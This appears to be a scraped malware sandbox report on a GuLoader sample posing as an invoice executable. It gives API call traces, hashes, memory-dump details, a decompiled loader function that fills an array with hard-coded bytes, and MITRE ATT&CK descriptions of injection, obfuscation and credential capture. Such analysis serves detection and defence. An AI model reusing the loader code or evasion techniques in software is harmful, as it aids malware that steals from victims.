__vbaNew2.MSVBVM60(00403C68,004223FC,?,?,?,?,?,00401356), ref: 0042115C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000014), ref: 004211B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,000000C8), ref: 0042120E
__vbaFreeObj.MSVBVM60(00000000,?,00403C78,000000C8), ref: 0042122D
__vbaUbound.MSVBVM60(00000001,?), ref: 00421238
__vbaAryDestruct.MSVBVM60(00000000,?,004212CE,?,?,?,?,?,00401356), ref: 004212C8

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$List$#698ChkstkConstruct2DestructUbound
String ID:
API String ID: 2830902964-0
Opcode ID: 038073ea52646fe5b9b846dcfe58f91d7d64f014d2bf3e781aa780176605bd13
Instruction ID: e016c5b9243b7848a5343563f730921c737748cf21742ffe5de8e375eab87175
Opcode Fuzzy Hash: 038073ea52646fe5b9b846dcfe58f91d7d64f014d2bf3e781aa780176605bd13
Instruction Fuzzy Hash: 9DA12871A00228EFDB10DF94DC45F9DBBB8BF08304F5080AAE549B72A1DB785A84DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0041F99C, Relevance: 15.2, APIs: 10, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041F99C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long* _v16;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				char _v52;
				char* _t105;
				void* _t167;
				void* _t169;
				void* _t171;
				void* _t173;
				void* _t175;
				void* _t177;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t185;
				void* _t187;
				void* _t189;
				void* _t191;
				void* _t193;
				void* _t195;
				void* _t197;
				void* _t202;
				void* _t204;
				long long* _t205;

				_t205 = _t204 - 0xc;
				 *[fs:0x0] = _t205;
				L00401350();
				_v16 = _t205;
				_v12 = 0x401280;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x24,  *[fs:0x0], 0x401356, _t202);
				 *_t205 =  *0x401278;
				L004014A0();
				L004014A6();
				asm("fcomp qword [0x401270]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags >= 0) {
					_push(0x91);
					_push(0x36);
					_push(0x50);
					_push( &_v52);
					L0040149A();
					_push( &_v52);
					L004014DC();
					L00401560();
					L0040157E();
					_push(0);
					_push(0x10);
					_push(1);
					_push(0x11);
					_push( &_v32);
					_push(1);
					_push(0x80);
					L00401494();
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + 0 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x85;
					_t167 = 1;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t167 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xa;
					_t169 = 2;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t169 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x10;
					_t171 = 3;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t171 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x30;
					_t173 = 4;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t173 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x69;
					_t175 = 5;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t175 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x5e;
					_t177 = 6;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t177 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x4f;
					_t179 = 7;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t179 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xfb;
					_t181 = 8;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t181 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xa2;
					_t183 = 9;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t183 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x1d;
					_t185 = 0xa;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t185 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x14;
					_t187 = 0xb;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t187 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xec;
					_t189 = 0xc;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t189 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x58;
					_t191 = 0xd;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t191 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x9f;
					_t193 = 0xe;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t193 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xe2;
					_t195 = 0xf;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t195 -  *((intOrPtr*)(_v32 + 0x14)))) = 0xbd;
					_t197 = 0x10;
					 *((char*)( *((intOrPtr*)(_v32 + 0xc)) + _t197 -  *((intOrPtr*)(_v32 + 0x14)))) = 0x6e;
				}
				_v36 = 0x7d58f0;
				asm("wait");
				_push(0x41fbb6);
				L00401554();
				_t105 =  &_v32;
				_push(_t105);
				_push(0);
				L004014D6();
				return _t105;
			}

0x0041f99f
0x0041f9ae
0x0041f9b8
0x0041f9c0
0x0041f9c3
0x0041f9ca
0x0041f9d9
0x0041f9e4
0x0041f9e7
0x0041f9ec
0x0041f9f1
0x0041f9f7
0x0041f9f9
0x0041f9fa
0x0041fa00
0x0041fa05
0x0041fa07
0x0041fa0c
0x0041fa0d
0x0041fa15
0x0041fa16
0x0041fa20
0x0041fa28
0x0041fa2d
0x0041fa2f
0x0041fa31
0x0041fa33
0x0041fa38
0x0041fa39
0x0041fa3b
0x0041fa40
0x0041fa56
0x0041fa5f
0x0041fa69
0x0041fa72
0x0041fa7c
0x0041fa85
0x0041fa8f
0x0041fa98
0x0041faa2
0x0041faab
0x0041fab5
0x0041fabe
0x0041fac8
0x0041fad1
0x0041fadb
0x0041fae4
0x0041faee
0x0041faf7
0x0041fb01
0x0041fb0a
0x0041fb14
0x0041fb1d
0x0041fb27
0x0041fb30
0x0041fb3a
0x0041fb43
0x0041fb4d
0x0041fb56
0x0041fb60
0x0041fb69
0x0041fb73
0x0041fb7c
0x0041fb86
0x0041fb86
0x0041fb8a
0x0041fb91
0x0041fb92
0x0041fba5
0x0041fbaa
0x0041fbad
0x0041fbae
0x0041fbb0
0x0041fbb5

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F9B8
#582.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F9E7
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401356), ref: 0041F9EC
#539.MSVBVM60(00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041FA0D
__vbaStrVarMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041FA16
__vbaStrMove.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041FA20
__vbaFreeVar.MSVBVM60(00000036,00000036,00000050,00000036,00000091,?,?,?,?,?,?,00401356), ref: 0041FA28
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000010,00000000,00000036,00000036,00000050,00000036,00000091), ref: 0041FA40
__vbaFreeStr.MSVBVM60(0041FBB6), ref: 0041FBA5
__vbaAryDestruct.MSVBVM60(00000000,?,0041FBB6), ref: 0041FBB0

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$#539#582ChkstkDestructRedim
String ID:
API String ID: 1927214042-0
Opcode ID: 33ca24e8c9deba5b9eb4be82c0f34592feb830c299d7995a12854086ac3a63e7
Instruction ID: d0b302cf8238f7a1db5c7f83c8c14ac5e751b2cbf333621851a287c83614af1f
Opcode Fuzzy Hash: 33ca24e8c9deba5b9eb4be82c0f34592feb830c299d7995a12854086ac3a63e7
Instruction Fuzzy Hash: D7812175A101459FDB19DFA8D985F6ABBB0EB09710F06818AFD509F3E2C778E442CB21

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FAKTURA 9502461485.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: FAKTURA 9502461485.exe PID: 6644 Parent PID: 5452

General

Chronological Activities

Analysis Process: conhost.exe PID: 6744 Parent PID: 6644

General

Chronological Activities

Function 0041D1A4, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804
COMMON

Function 0041F4AD, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358
COMMON

Function 004212ED, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Function 0041F07C, Relevance: 13.6, APIs: 9, Instructions: 76
COMMON

Function 00421443, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Function 004015A8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296
COMMON

Function 0041FBDD, Relevance: 91.4, APIs: 50, Strings: 2, Instructions: 369
COMMON

Function 0042049A, Relevance: 89.6, APIs: 41, Strings: 10, Instructions: 340
COMMON

Function 00420A97, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206
COMMON

Function 0041F192, Relevance: 49.2, APIs: 26, Strings: 2, Instructions: 177
COMMON

Function 004201AA, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 174
COMMON

Function 00420D98, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 98
COMMON

Function 00420F3D, Relevance: 27.2, APIs: 18, Instructions: 219
COMMON

Function 0041F99C, Relevance: 15.2, APIs: 10, Instructions: 183
COMMON